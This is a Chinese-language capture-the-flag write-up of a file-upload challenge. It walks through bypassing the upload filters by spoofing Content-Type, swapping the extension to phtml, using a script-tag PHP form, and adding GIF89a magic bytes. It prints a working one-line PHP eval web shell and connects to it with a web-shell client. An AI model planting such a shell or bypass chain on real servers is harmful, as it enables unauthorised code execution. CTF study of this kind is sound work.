0x01 题目
0x02 解题过程尝试把一句话木马原封不动上传,提示需要image。
那行,咱继续尝试各种文件上传姿势。首先改Content-Type为image/jpeg。
看来后缀名不能为php,那么再改各种后缀名试试,例如,php3,php4,php5,phtml,phar。我改成phtml。
看来不能含有'<?', 那么我们就需要把php换一种格式了,看下图:
还是不行,叫我别骗他了窝。那行,那我再骗一波,加上gif的文件幻数,在PHP代码前加上GIF89a:
GIF89a <script language="php"> @eval($_POST['hacker']); </script>
搞定,但没有显示文件路径,猜测在upload目录下,于是尝试访问:
只看到GIF89a,但看不到脚本代码,一般是成功了,用蚁剑尝试连接:
连上了以后直接在根目录下找到flag,完成。 flag{2e58d7d7-b6c2-44a2-9890-aae4edfdbcfc}
最后,欢迎师傅们指正和讨论~ |
|
|
